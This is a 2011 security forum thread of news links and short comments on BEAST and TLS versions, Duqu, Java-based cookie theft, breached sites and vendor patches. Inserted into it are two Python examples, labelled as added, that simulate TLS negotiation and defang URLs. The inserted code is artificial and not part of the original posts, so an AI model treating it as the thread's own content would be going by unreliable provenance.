Hi Asyn,
There is a FixIT - http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx (link from social.s-msft.com - link source author: swiat)
polonus
I checked the manual edit; I must say it doesn't work because I can't do it myself due to the line max character limit.
If I just copy the actual line and change the order, I'm missing approx. 50 characters over 1024.
Jeez, who in these days has a character limit...
-
Mac trojan posing as a PDF file
http://www.f-secure.com/weblog/archives/00002241.html
Apple Updates Anti-Malware Tools to Address New Trojan Threat
http://www.macrumors.com/2011/09/26/apple-updates-anti-malware-tools-to-address-new-trojan-threat/
-
"Firefox devs mull dumping Java to stop BEAST attacks"
http://www.theregister.co.uk/2011/09/29/firefox_killing_java/
-
Mozilla discussion here (about Java)
https://bugzilla.mozilla.org/show_bug.cgi?id=689661
I recommend that we blocklist all versions of the Java Plugin.
As far as I understand the situation, If all of these apply:
(1) The attacker can control the user's network connection, and
(2) The attacker can perform DNS rebinding or similar
(3) The user loads any non-HTTPS page, or the user loads an HTTPS page controlled by the attacker
(4) The Java plugin is enabled
then, the attacker will be able to steal the user's *existing* session cookies for any website, including any *HTTPS* website that the user visits, even when the cookies are marked Secure and HttpOnly. So, for example, the attacker would be able to steal the user's Google mail cookie, Paypal cookie, bugzilla.mozilla.org cookie, mail.mozilla.com cookie, etc., allowing the attacker to log in as the user.
My understanding is that Oracle may or may not be aware of the details of the same-origin exploit. As of now, we have no ETA for a fix for the Java plugin.
-
Seems lunacy for Firefox to drop Java (when many may not have it anyway) when essentially the vulnerability is in the SSL/TLS version used by the browser for secure communication. The vulnerable versions being SSL 3.0 and TLS 1.0. Surely they should be working towards Firefox using TLS 1.1 and 1.2, which aren't susceptible.
I also thought it was a specially crafted JavaScript and not Java that did the decryption, which is immaterial if versions 1.1 and 1.2 of TLS aren't susceptible; gear Firefox up to use those versions.
-
For their chosen-plaintext attack on the Cipher-Block Chaining (CBC) mode that tends to be used with TLS, Rizzo and Duong have to bypass the browser's Same Origin Policy (SOP) so that they can communicate with servers outside of, for instance, the Java applet's domain.
Although the purpose of SOPs is to prevent exactly that, a previously undisclosed bug in Java appears to enable attackers to do so regardless. In the Firefox developers' opinion, the onus is therefore on Oracle to solve the Java problem first. However, Oracle has so far failed to respond, which has prompted the developers to consider releasing an update that disables all Java plug-ins for security reasons.
http://www.h-online.com/security/news/item/Mozilla-considers-disabling-Java-in-Firefox-1351590.html
-
Seems lunacy for Firefox to drop Java (when many may not have it anyway) when essentially the vulnerability is in the SSL/TLS version used by the browser for secure communication. The vulnerable versions being SSL 3.0 and TLS 1.0. Surely they should be working towards Firefox using TLS 1.1 and 1.2, which aren't susceptible.
I also thought it was a specially crafted JavaScript and not Java that did the decryption, which is immaterial if versions 1.1 and 1.2 of TLS aren't susceptible; gear Firefox up to use those versions.
David, I already disabled TLS 1.0 in the past once in Firefox >>> end result? ... most secure sites don't use TLS 1.1 and later, you get an error message and the sites won't open.
-
Yes sites have to play their part too and update vulnerable SSL/TLS versions. Problem being the chicken and the egg, if browsers don't give the option/work with the later TLS versions, then sites won't bother either.
Disabling TLS 1.0 in firefox is a bit of a waste of time right now, as it would then fall back to SSL 3.0 which is also vulnerable. FF7 and below only have SSL3 and TLS 1.0 as the encryption protocol options.
-
Nope, not here ;D that's why I tried it a while ago, as I'm using FIPS settings as a basis in FF. SSL3 is disabled (not just from the advanced settings, that's not enough). So when I disabled TLS 1.0, I made the mistake of believing that 1.1 and later were present in FF; well, they're not. But they're available in Windows for IE (TLS 1.1 and later). That's where you can actually experiment and see that no site supports that; see screenshot with default settings.
-
Which is why I'm saying Mozilla needs to concentrate some effort in firefox having TLS 1.1 and 1.2 as options. Then at least when sites start to catch up their users have it as an option.
So it could at least be a selection preference TLS 1.2, drop to 1.1 and then to 1.0 if the site doesn't have the higher level TLS support. Then if the user so chooses they can uncheck TLS 1.0 so they at least know that the site has a security weakness and choose if they want to enable 1.0 for that instance.
The problem is when they have no option at all when both versions in firefox are vulnerable.
However, all that said, I think that this really has had more headline grabbing attention when this isn't going to be a very common occurrence. Plus no mention of what the user's own security applications can do to block the specially crafted script that does the decryption. Not to mention the time it takes.
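The fallback order described in this post (prefer TLS 1.2, drop to 1.1, then 1.0, and let the user switch the weak versions off) can be written down as a small policy check. The block below is an added example and not code from the thread or from Mozilla: the version names, the browser/server sets and the "weak" list are assumptions taken from the discussion above, and `strict_client_context()` shows the real Python `ssl` setting that refuses anything below TLS 1.2 on the client side.

```python
import ssl

# Browser-side preference order, strongest first (assumption based on the thread:
# an FF7-era browser only has the last two entries enabled).
PREFERENCE = ["TLS 1.2", "TLS 1.1", "TLS 1.0", "SSL 3.0"]

# Versions the thread treats as vulnerable to the attack under discussion.
WEAK = {"TLS 1.0", "SSL 3.0"}


def negotiate(enabled_in_browser, offered_by_server):
    """Return the strongest version both sides allow, walking down PREFERENCE."""
    for version in PREFERENCE:
        if version in enabled_in_browser and version in offered_by_server:
            return version
    return None  # no common version: the connection fails


def assess(enabled_in_browser, offered_by_server):
    """Classify the outcome: ('ok', v), ('weak', v) or ('no-connection', None)."""
    chosen = negotiate(enabled_in_browser, offered_by_server)
    if chosen is None:
        return ("no-connection", None)
    return ("weak" if chosen in WEAK else "ok", chosen)


def strict_client_context():
    """Real ssl.SSLContext that refuses to negotiate anything below TLS 1.2."""
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


if __name__ == "__main__":
    # FF7 defaults against a typical 2011 server: TLS 1.0 is picked, which is weak.
    print(assess({"TLS 1.0", "SSL 3.0"}, {"TLS 1.0", "SSL 3.0"}))
    # User unticks TLS 1.0 but leaves SSL3: the browser silently falls back to SSL 3.0.
    print(assess({"SSL 3.0"}, {"TLS 1.0", "SSL 3.0"}))
    # FIPS-style setup with SSL3 off as well: nothing left to agree on.
    print(assess(set(), {"TLS 1.0", "SSL 3.0"}))
    # A browser and a server that both offer TLS 1.2: safe choice.
    print(assess({"TLS 1.2", "TLS 1.1", "TLS 1.0"}, {"TLS 1.2", "TLS 1.0"}))
```

The second call reproduces the point made above: unticking TLS 1.0 alone buys nothing when SSL 3.0 is still enabled, because the negotiation just drops one step further.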
-
the simple solution is to use RC4 instead of CBC, the problem here is ... I can't switch it manually in the policy editor because some idiot at Microsoft decided 1024 characters is the maximum for that line
yet the DEFAULT value uses 1080 characters lol
-
Chrome: Problems with Microsoft Security Essentials
http://chrome.blogspot.com/2011/09/problems-with-microsoft-security.html
Edit: Chrome updates to repair Microsoft false alarm damage
http://www.h-online.com/security/news/item/Chrome-updates-to-repair-Microsoft-false-alarm-damage-1353162.html
-
Cisco patch day closes critical vulnerabilities
http://www.h-online.com/security/news/item/Cisco-patch-day-closes-critical-vulnerabilities-1354156.html
http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_sep11.html
-
Security Advisory for Adobe Photoshop Elements 8
http://www.adobe.com/support/security/advisories/apsa11-03.html
-
Firefox and SeaMonkey users warned to disable McAfee ScriptScan
http://www.h-online.com/security/news/item/Firefox-and-SeaMonkey-users-warned-to-disable-McAfee-ScriptScan-1355098.html
https://addons.mozilla.org/en-US/firefox/blocked/i42/
-
VMware hosted products address remote code execution vulnerability
http://www.vmware.com/security/advisories/VMSA-2011-0011.html
-
Scum sucking, pond life, bottom feeding scammers have jumped on this news of the death of Steve Jobs.
http://uk.news.yahoo.com/facebook-scammers-prey-on-steve-jobs-death.html
Facebook scammers have seized on the death of Apple co-founder and visionary Steve Jobs by posting malicious content claiming to be giving away free iPads ‘in memory of Steve’.
Not sure if you will be able to access this link or not, but I'm sure this news will be out in other media outlets. Suffice to say this may spread the usual social engineering attacks/emails, etc. trying to trick the unwary.
-
more on the above...
Cybercriminals Remember Steve Jobs Through Facebook Scam
http://blog.trendmicro.com/cybercriminals-remember-steve-jobs-through-facebook-scam/
-
Yes, it doesn't take these scum-sucking leeches long to latch on to the next big social event.
-
Cisco patch day closes critical vulnerabilities
http://www.h-online.com/security/news/item/Cisco-patch-day-closes-critical-vulnerabilities-1354156.html
http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_sep11.html
More patches from Cisco
http://www.h-online.com/security/news/item/More-patches-from-Cisco-1356415.html
-
Microsoft Security Bulletin Advance Notification for October 2011
http://technet.microsoft.com/en-us/security/bulletin/ms11-oct
-
Malicious images (codes)
http://www.norman.com/security_center/security_center_archive/2011/malicious_images_or_codes/en-uk
Malicious QR Codes Pushing Android Malware
http://www.securelist.com/en/blog/208193145/Its_time_for_malicious_QR_codes
-
Malicious images (codes)
http://www.norman.com/security_center/security_center_archive/2011/malicious_images_or_codes/en-uk
Malicious QR Codes Pushing Android Malware
http://www.securelist.com/en/blog/208193145/Its_time_for_malicious_QR_codes
I wish we had avast for Blackberry... I wish avast mobile detected such malware...
But it is only a wish, further from reality. The reality is the malware in the other side of the bar code...
-
WineHQ database compromise
http://www.winehq.org/pipermail/wine-users/2011-October/097753.html
-
Fedora Project: Mandatory password and ssh key change by 2011-11-30
http://lists.fedoraproject.org/pipermail/devel-announce/2011-October/000840.html
-
Critical security hole in current version of Opera
http://www.h-online.com/security/news/item/Critical-security-hole-in-current-version-of-Opera-1362504.html
http://spa-s3c.blogspot.com/2011/10/spas3c-sv-006opera-browser-101112-0-day.html
-
Oracle Critical Patch Update Pre-Release Announcement - October 2011
http://www.oracle.com/technetwork/topics/security/cpuoct2011-330135.html
Oracle Java SE Critical Patch Update Pre-Release Announcement - October 2011
http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html
-
Critical security hole in current version of Opera
http://www.h-online.com/security/news/item/Critical-security-hole-in-current-version-of-Opera-1362504.html
http://spa-s3c.blogspot.com/2011/10/spas3c-sv-006opera-browser-101112-0-day.html
Opera 11.52 is available for download/upgrade today.
-
W32.Duqu: The Precursor to the Next Stuxnet
http://www.symantec.com/connect/w32_duqu_precursor_next_stuxnet
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf
-
Hi Asyn,
The C-media Certificate was apparently stolen: http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf
And here F-Secure's Mikko states that w32_duqu was made by the same makers of the previous Stuxnet malware: http://www.f-secure.com/weblog/archives/00002255.html
polonus
-
Nasdaq hackers spied on company boards
http://www.reuters.com/article/2011/10/20/us-nasdaq-hacking-idUSTRE79J84T20111020
-
asyn, wow, you're like an information ninja, don't you ever sleep? ;D
-
Hi Asyn,
The C-media Certificate was apparently stolen: http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf
And here F-Secure's Mikko states that w32_duqu was made by the same makers of the previous Stuxnet malware: http://www.f-secure.com/weblog/archives/00002255.html
polonus
Great to see Polonus back :-)
-
Imperva, a pioneer and leader of a new category of data security solutions for high-value business data in the data center, announced today the release of the “The Monthly Trend Report,” the fifth in the Hacker Intelligence Initiative research series. The report analyzes the content and activities of an online hacker forum with nearly 220,000 registered members, although many are dormant.
More: http://www.imperva.com/news/press/2011/10_17_Imperva_Releases_First_Comprehensive_Hacker_Forum_Analysis.html
Read the report here (Google viewer): http://docs.google.com/viewer?url=http://www.imperva.com/docs/HII_Monitoring_Hacker_Forums.pdf
-
Hi,
I am a new user and hence unsure if this message is posted in the correct section.
Avast warns of a trojan on the site <www.madrasgymkhanaclub.com> with the message
"Infection: js:Downloader-BAX [Trj]"
Screenshot attached. The webmaster insists there is no trojan on the site and other programs like Norton Security allow access to the site without warning.
How do I know if there is a threat or not? Further, is there any check/link for online verification of infected URLs/sites?
Thanks
Ranjit
-
Hi, I am a new user and hence unsure if this message is posted in the correct section.
Yes, you posted in an ongoing thread for security notices, wrong place.
Please start your own topic in this section >> http://forum.avast.com/index.php?board=4.0
-
I am a new user and hence unsure if this message is posted in the correct section.
Avast warns of a trojan on the site <wXw.madrasgymkhanaclub.com> with the message
"Infection: js:Downloader-BAX [Trj]"
As mentioned this is in the wrong place and the site does appear to have been infected/hacked - Please 'modify' your post and change the URL from http to hXXp or www to wXw, to break the link and avoid accidental exposure to suspect sites (as I did in the quoted text), thanks.
But a quick confirmation (no further input should be in this topic but its own new topic) - Avast isn't the only thing which considers it infected http://sitecheck.sucuri.net/scanner/ and check for yourself, image extract of results below.
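The "break the link" habit asked for above (http to hXXp, www to wXw) is easy to automate so that pasted URLs never become clickable by accident. The block below is an added example, not code from this thread or from the forum software; it also replaces the dots in the host with `[.]`, a common defanging convention the post itself does not mention, and provides the reverse `refang` so an analyst can restore the original. The sample URLs are constructed.

```python
import re

# Scheme rewrites used when defanging; other schemes are left untouched.
SCHEME_MAP = {"http": "hXXp", "https": "hXXps", "ftp": "fXp"}

_SCHEME_RE = re.compile(r"^(?P<scheme>[A-Za-z][A-Za-z0-9+.-]*)://(?P<rest>.*)$")


def defang(url):
    """Make a URL non-clickable: hXXp://, wXw., and [.] between host labels."""
    m = _SCHEME_RE.match(url)
    if m:
        scheme = m.group("scheme").lower()
        prefix = SCHEME_MAP.get(scheme, scheme) + "://"
        rest = m.group("rest")
    else:
        prefix, rest = "", url          # bare host, e.g. www.example.com/path

    # Only the host part is rewritten; the path is left readable.
    host, sep, path = rest.partition("/")
    if host.lower().startswith("www."):
        host = "wXw." + host[4:]
    host = host.replace(".", "[.]")
    return prefix + host + sep + path


def refang(text):
    """Undo defang() so the URL can be fed to a scanner such as a site checker."""
    out = text.replace("[.]", ".")
    for real, fake in SCHEME_MAP.items():
        out = out.replace(fake + "://", real + "://")
    return out.replace("wXw.", "www.")


if __name__ == "__main__":
    # Constructed examples, not URLs taken from the thread.
    for u in ("http://www.example.com/index.php", "https://dl.example.net/a.js",
              "www.example.org/page"):
        d = defang(u)
        print(u, "->", d, "->", refang(d))
```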
-
Adobe remedies webcam spy hole in Flash
http://www.h-online.com/security/news/item/Adobe-remedies-webcam-spy-hole-in-Flash-1364631.html
http://blogs.adobe.com/psirt/2011/10/clickjacking-issue-in-adobe-flash-player-settings-manager.html
http://www.feross.org/webcam-spy/
-
Mac Trojan Disables XProtect Updates
http://www.f-secure.com/weblog/archives/00002256.html
-
MyBB downloads were infected
http://www.h-online.com/open/news/item/MyBB-downloads-were-infected-1366300.html
http://blog.mybb.com/2011/10/25/some-closure-on-the-1-6-4-security-vulnerability/
-
Avira anti-virus detects itself
http://www.h-online.com/security/news/item/Avira-anti-virus-detects-itself-1367055.html
-
Avira anti-virus detects itself
I don't blame it for detecting itself, lol. :D ;D
-
Avira anti-virus detects itself
I don't blame it for detecting itself, lol. :D ;D
Yes, me neither. ;D 8)
-
Avira anti-virus detects itself
;D LOL ;D
-
Avira anti-virus detects itself
http://www.h-online.com/security/news/item/Avira-anti-virus-detects-itself-1367055.html
Ouch! ;D
-
Hi Omid Farhang,
We all have our painful moments. Nothing to see here, time to move on...
pol
-
Avira anti-virus detects itself
http://www.h-online.com/security/news/item/Avira-anti-virus-detects-itself-1367055.html
LOL ;D
-
Lenovo T520 XP-64 Business Avast.
Here's what's happening. When I try to install bluetooth, Avast complains with the error code attached and BT never installs correctly.
Can anyone help on this? mitch DOT landry AT rawsonemt DOT com
<?xml version="1.0" encoding="UTF-16"?>
<DATABASE>
<EXE NAME="avast.setup" FILTER="GRABMI_FILTER_PRIVACY">
<MATCHING_FILE NAME="setiface.dll" SIZE="192048" CHECKSUM="0x39B6DD52" MODULE_TYPE="WIN32" PE_CHECKSUM="0x39AD5" LINKER_VERSION="0x50000" LINK_DATE="09/06/2011 21:04:25" UPTO_LINK_DATE="09/06/2011 21:04:25" />
<MATCHING_FILE NAME="INF\x64\aswBoot.exe" SIZE="254400" CHECKSUM="0xC778AB61" BIN_FILE_VERSION="6.0.1289.0" BIN_PRODUCT_VERSION="6.0.1289.0" PRODUCT_VERSION="6.0.1289.0" FILE_DESCRIPTION="avast! start-up scanner" COMPANY_NAME="AVAST Software" PRODUCT_NAME="avast! Antivirus " FILE_VERSION="6.0.1289.0" ORIGINAL_FILENAME="aswBoot.exe" INTERNAL_NAME="aswBoot" LEGAL_COPYRIGHT="Copyright (c) 2011 AVAST Software" VERFILEDATEHI="0x0" VERFILEDATELO="0x0" VERFILEOS="0x4" VERFILETYPE="0x0" MODULE_TYPE="WIN32" PE_CHECKSUM="0x0" LINKER_VERSION="0x50000" UPTO_BIN_FILE_VERSION="6.0.1289.0" UPTO_BIN_PRODUCT_VERSION="6.0.1289.0" LINK_DATE="09/06/2011 20:44:25" UPTO_LINK_DATE="09/06/2011 20:44:25" VER_LANGUAGE="Czech [0x405]" />
<MATCHING_FILE NAME="INF\x64\netcfg_x64.exe" SIZE="76336" CHECKSUM="0xB89E2E93" MODULE_TYPE="WIN32" PE_CHECKSUM="0x1F0AC" LINKER_VERSION="0x0" LINK_DATE="02/17/2010 17:38:19" UPTO_LINK_DATE="02/17/2010 17:38:19" />
</EXE>
<EXE NAME="kernel32.dll" FILTER="GRABMI_FILTER_THISFILEONLY">
<MATCHING_FILE NAME="kernel32.dll" SIZE="1504256" CHECKSUM="0x5CD29B99" BIN_FILE_VERSION="5.2.3790.4480" BIN_PRODUCT_VERSION="5.2.3790.4480" PRODUCT_VERSION="5.2.3790.4480" FILE_DESCRIPTION="Windows NT BASE API Client DLL" COMPANY_NAME="Microsoft Corporation" PRODUCT_NAME="Microsoft® Windows® Operating System" FILE_VERSION="5.2.3790.4480 (srv03_sp2_gdr.090321-1244)" ORIGINAL_FILENAME="kernel32" INTERNAL_NAME="kernel32" LEGAL_COPYRIGHT="© Microsoft Corporation. All rights reserved." VERFILEDATEHI="0x0" VERFILEDATELO="0x0" VERFILEOS="0x40004" VERFILETYPE="0x2" MODULE_TYPE="WIN32" PE_CHECKSUM="0x1773D3" LINKER_VERSION="0x50002" UPTO_BIN_FILE_VERSION="5.2.3790.4480" UPTO_BIN_PRODUCT_VERSION="5.2.3790.4480" LINK_DATE="03/21/2009 16:59:09" UPTO_LINK_DATE="03/21/2009 16:59:09" VER_LANGUAGE="English (United States) [0x409]" />
</EXE>
</DATABASE>
-
@Skiggly
When/if you need help, start your own topic where you explain your problem.
Do not post inside another topic, especially one that has nothing to do with your problem.
-
No surprise...
Gadhafi-themed targeted malware
http://blogs.norman.com/2011/malware-detection-team/gadhafi-themed-targeted-malware
VirusTotal scan - Oct. 21
http://www.virustotal.com/file-scan/report.html?id=2978c6cfff1754c85a4a22b6a72dc9e60b596b54e65ed5ab2c80b8bc259ca5dc-1319203716
Screaming Headlines Shout Malware Danger
http://blogs.norman.com/2011/for-consumption/screaming-headlines-shout-malware-danger
-
Denial of Service attacks against secure web sites
http://www.norman.com/security_center/security_center_archive/2011/dos_attacks_against_secure_web_sites/en-us
-
Worm wriggles through year-old flaw, builds zombie-net. More a business failure than a software security failure
http://www.theregister.co.uk/2011/10/26/jboss_worm/
Tsunami Trojan: First Mac attack based on Linux crack. Slips in Mac OS X backdoor, phones home
http://www.theregister.co.uk/2011/10/26/tsunami_mac_backdoor/
-
Facebook sees 600,000 compromised logins per day
http://arstechnica.com/gadgets/news/2011/10/facebook-sees-600000-compromised-logins-per-day006-of-all-logins.ars
-
Duqu exploits previously unknown vulnerability in Windows kernel
http://www.h-online.com/security/news/item/Duqu-exploits-previously-unknown-vulnerability-in-Windows-kernel-1370369.html
-
Facebook sees 600,000 compromised logins per day
http://arstechnica.com/gadgets/news/2011/10/facebook-sees-600000-compromised-logins-per-day006-of-all-logins.ars
I still wonder if "compromised" means actual hacked accounts or simply attempts to access an account using
an incorrect password ??? (Something all of us have probably done on occasion.)
-
Duqu exploits previously unknown vulnerability in Windows kernel
http://www.h-online.com/security/news/item/Duqu-exploits-previously-unknown-vulnerability-in-Windows-kernel-1370369.html
Microsoft releases Security Advisory 2639658
http://blogs.technet.com/b/msrc/archive/2011/11/03/microsoft-releases-security-advisory-2639658.aspx
https://technet.microsoft.com/en-us/security/advisory/2639658
-
Duqu exploits previously unknown vulnerability in Windows kernel
http://www.h-online.com/security/news/item/Duqu-exploits-previously-unknown-vulnerability-in-Windows-kernel-1370369.html
Microsoft releases Security Advisory 2639658
http://blogs.technet.com/b/msrc/archive/2011/11/03/microsoft-releases-security-advisory-2639658.aspx
https://technet.microsoft.com/en-us/security/advisory/2639658
So the fix involves something that might break other things. I'll wait for the actual patch and depend on Avast in the meantime.
-
Whilst I too will wait for the actual security update, when you download the hotfix/fixit there is normally an associated one to reverse the fix. If I were to use the fixit I would download the reversal function also.
-
Microsoft is currently still working on a security update. However, the company said that the update will not be ready in time for its upcoming monthly patch day, known as Patch Tuesday, next week.
As Dave said, you can Enable/Disable the fix: http://support.microsoft.com/kb/2639658
-
Revoking Trust in DigiCert Sdn. Bhd Intermediate Certificate Authority
https://blog.mozilla.com/security/2011/11/03/revoking-trust-in-digicert-sdn-bhd-intermediate-certificate-authority/
http://blogs.technet.com/b/msrc/archive/2011/11/03/untrusted-certificate-store-to-be-updated.aspx
http://www.entrust.net/advisories/malaysia.htm
-
Microsoft Security Bulletin Advance Notification for November 2011
http://technet.microsoft.com/en-us/security/bulletin/ms11-nov
-
Major DNS Cache Poisoning Attack Hits Brazilian ISPs
There is a large-scale DNS cache-poisoning attack going on in Brazil at the moment, with potentially millions of users affected by a tactic that is forcing them to install a malicious Java applet before they can reach many popular sites, including Google, Gmail and Hotmail.
More: http://threatpost.com/en_us/blogs/major-dns-cache-poisoning-attack-hits-brazilian-isps-110711
-
Duqu exploits previously unknown vulnerability in Windows kernel
http://www.h-online.com/security/news/item/Duqu-exploits-previously-unknown-vulnerability-in-Windows-kernel-1370369.html
Microsoft releases Security Advisory 2639658
http://blogs.technet.com/b/msrc/archive/2011/11/03/microsoft-releases-security-advisory-2639658.aspx
https://technet.microsoft.com/en-us/security/advisory/2639658
Nice..!!! :)
http://www.avast.com/zero-day-exploit-reports
-
Security update available for Adobe Shockwave Player
http://www.adobe.com/support/security/bulletins/apsb11-27.html
-
Security update available for Adobe Shockwave Player
http://www.adobe.com/support/security/bulletins/apsb11-27.html
Thanks, I didn't even know I had it installed. It must have come with the computer. I just updated it but I'm not sure I even need it.
-
Security update available for Adobe Shockwave Player
http://www.adobe.com/support/security/bulletins/apsb11-27.html
Thanks, I didn't even know I had it installed. It must have come with the computer. I just updated it but I'm not sure I even need it.
NP. And if you don't need it, just drop it. ;)
-
Are Adobe Shockwave Player and Adobe Flash Player now rolled into one application/plug-in called Adobe Shockwave Player ?
-
Are Adobe Shockwave Player and Adobe Flash Player now rolled into one application/plug-in called Adobe Shockwave Player ?
AFAIK, Flash Player and Shockwave Player are still 2 different things. I certainly have them both as separated tools, with different versions. Both are from Adobe.
-
Yes, thought so, but the plugin for Adobe Flash Player in Firefox is reported as Shockwave Flash (and I thought I had avoided Adobe Shockwave Player).
-
At Adobe homepage, see attachment.
-
Adobe Flash and Adobe AIR security vulnerability fixed, new versions released
http://www.adobe.com/support/security/bulletins/apsb11-28.html
details and download: http://forum.avast.com/index.php?topic=9671.msg706346#msg706346
-
FBI busts global internet fraud ring.
http://www.dailytelegraph.com.au/technology/fbi-busts-internet-fraud-ring-affecting-tens-of-thousands-of-australian-computers/story-fn7bsi21-1226192935830
-
Steam compromised by hackers
http://www.h-online.com/security/news/item/Steam-compromised-by-hackers-1377240.html
-
Malware Signed With a Governmental Signing Key
http://www.f-secure.com/weblog/archives/00002269.html
-
Steam compromised by hackers
http://www.h-online.com/security/news/item/Steam-compromised-by-hackers-1377240.html
Thanks for the warning as I used Steam for all my Call of Duty Modern Warfare games ;)
-
Steam compromised by hackers
http://www.h-online.com/security/news/item/Steam-compromised-by-hackers-1377240.html
Thanks for the warning as I used Steam for all my Call of Duty Modern Warfare games ;)
NP pal. :)
-
Apple OS X Sandbox Predefined Profiles Bypass
http://www.coresecurity.com/content/apple-osx-sandbox-bypass
-
Steam compromised by hackers
http://www.h-online.com/security/news/item/Steam-compromised-by-hackers-1377240.html
It was really only the forums that were affected and that has been resolved.
-
not true, both STEAM forum and STEAM user database were leaked,
it's unknown what type of encryption was used for STEAM account passwords
only that the part with CreditCards info was by AES256
-
not true, both STEAM forum and STEAM user database were leaked,
it's unknown what type of encryption was used for STEAM account passwords
only that the part with CreditCards info was by AES256
That's what they thought at first but there is no evidence of any compromise or illegal usage of customer data. The only impact was on the forums which had to be taken down temporarily. It's nothing like the fiasco with Sony. They may have gotten in but anything they got seems to have been unusable to them.
-
New facebook virus,here we go again :
http://www.zdnet.com/blog/facebook/facebook-confirms-images-of-porn-and-violence-is-investigating/5330?tag=content;siu-container
Facebook says it is aware of users reporting a huge flood of unwanted content. This includes links, videos, and images depicting pornography, acts of violence, self-mutilation, and bestiality.
-
Unknown network event causing BIND 9 DNS server crashes
http://www.h-online.com/open/news/item/Unknown-network-event-causing-BIND-9-DNS-server-crashes-1380518.html
https://www.isc.org/software/bind/advisories/cve-2011-4313
-
XSS vulnerability in the translate helper method in Ruby on Rails
http://groups.google.com/group/rubyonrails-security/browse_thread/thread/2b61d70fb73c7cc5
-
Spam Gets a Touch of Facebook Camouflage
http://blogs.norman.com/2011/for-consumption/spam-gets-a-touch-of-facebook-camouflage
Recycling – Not Always A Good Idea
http://blogs.norman.com/2011/for-consumption/recycling-not-always-a-good-idea
Invisible YNK, a Code Signing Conundrum
http://blogs.norman.com/2011/malware-detection-team/invisible-ynk-a-code-signing-conundrum
Back to the trojans. The one above is signed in June, and it’s now November, so this trojan has lived an undisturbed and validated life for about 4.5 months.
-
H(ackers)2O: Attack on City Water Station Destroys Pump
http://www.wired.com/threatlevel/2011/11/hackers-destroy-water-pump/all/1
-
German spyware exploits iTunes vulnerability
http://www.h-online.com/security/news/item/German-spyware-exploits-iTunes-vulnerability-1382455.html
-
H(ackers)2O: Attack on City Water Station Destroys Pump
http://www.wired.com/threatlevel/2011/11/hackers-destroy-water-pump/all/1
Alleged water utility hack causes confusion
http://www.h-online.com/security/news/item/Alleged-water-utility-hack-causes-confusion-1383976.html
-
German spyware exploits iTunes vulnerability
http://www.h-online.com/security/news/item/German-spyware-exploits-iTunes-vulnerability-1382455.html
Apple Took 3+ Years to Fix FinFisher Trojan Hole
http://krebsonsecurity.com/2011/11/apple-took-3-years-to-fix-finfisher-trojan-hole/
-
FakeAV/FakePoliceAlert: Source code for sale
http://xylibox.blogspot.com/2011/11/fakeavfakepolicealert-source-code-for.html
-
Google accounts are now more secure with two step verification.
http://lifehacker.com/5756977/set-up-googles-two+step-verification-now-for-seriously-enhanced-security-for-your-google-account
-
Google accounts are now more secure with two step verification.
http://lifehacker.com/5756977/set-up-googles-two+step-verification-now-for-seriously-enhanced-security-for-your-google-account
That's seriously old news as that was published by Adam Pash, Feb 10, 2011 8:30 AM
-
Sorry people, this two way verification notification just came up in my Gmail. Looking for more info I stumbled upon that article; after reading it, it looked cool but I totally missed the date. Sorry again for that old post :-[. Next time I will be careful :)
-
Facebook 'Deceived' Users, FTC Finds
http://www.pcmag.com/article2/0,2817,2396992,00.asp
-
Interesting read, Bob, thanks -- I think we'll agree we've seen it coming for a long, long time. Too bad charges can't be laid for actions prior to this new agreement.
-
Millions of printers open to devastating hack attack
http://redtape.msnbc.msn.com/_news/2011/11/29/9076395-exclusive-millions-of-printers-open-to-devastating-hack-attack-researchers-say
http://www.hp.com/hpinfo/newsroom/press/2011/111129b.html
-
Facebook 'Deceived' Users, FTC Finds
http://www.pcmag.com/article2/0,2817,2396992,00.asp
Facebook settles FTC privacy complaint, agrees to ask users’ permission for changes
http://www.washingtonpost.com/business/technology/facebook-settles-ftc-privacy-complaint-agrees-to-ask-users-permission-for-changes/2011/11/29/gIQAqyJC9N_story.html?wpisrc=nl_tech
-
Security Advisory for Adobe Reader and Acrobat
http://www.adobe.com/support/security/advisories/apsa11-04.html
-
Microsoft Security Bulletin Advance Notification for December 2011
http://technet.microsoft.com/en-us/security/bulletin/ms11-dec
-
Security Advisory for Adobe Reader and Acrobat
http://www.adobe.com/support/security/advisories/apsa11-04.html
Security updates available for Adobe Reader and Acrobat 9.x for Windows
http://www.adobe.com/support/security/bulletins/apsb11-30.html
-
Microsoft Windows win32k.sys Memory Corruption Vulnerability
http://secunia.com/advisories/47237/
-
Microsoft Windows win32k.sys Memory Corruption Vulnerability
http://secunia.com/advisories/47237/
Looks like it's only a problem if you use the Safari browser in Windows 7.
-
That would be my view of it as well, but the secunia report isn't very clear.
Solution
No effective solution is currently available.
If it only affects Safari, then the solution would be to use a different browser until Apple patches the Safari browser.
They also said it might affect other OS versions, but confirmed on Win7 64bit fully patched.
-
That would be my view of it as well, but the secunia report isn't very clear.
Here's a little bit more info...
http://www.h-online.com/security/news/item/Highly-critical-zero-day-vulnerability-in-Windows-discovered-1398625.html
-
Interesting, only in Win7 64bit, not Win7 32bit, and not confirming if this has been found in any other browser, so the assumption is that other browsers aren't affected ???
-
Second time around that the British Amnesty site has been infected with java malware. Good thing, avast detects. Read: http://www.barracudalabs.com/wordpress/index.php/2011/12/22/authoritarian-regime-uses-human-rights-group-to-spy-on-activists/
link article author = Paul Royal, Research Consultant
polonus
-
TDL3 infection paired with rogues: I have seen today a pair of computers at my workstation that are paired with a rootkit. Hopefully they are fairly easy to remove, so don't forget to run TDSSKiller after taking care of a FakeAV. ;)
-
TDL3 infection paired with rogues: I have seen today a pair of computers at my workstation that are paired with a rootkit. Hopefully they are fairly easy to remove, so don't forget to run TDSSKiller after taking care of a FakeAV. ;)
And where is this workstation? Your study desk in your bedroom?
-
Interesting, only in Win7 64bit, not Win7 32bit, and not confirming if this has been found in any other browser, so the assumption is that other browsers aren't affected ???
MS confirmed that IE prior to version 9 is also affected.
-
I suspected this was going to extend to other browsers, though is that still related to IE browsers on Win7 x64?
-
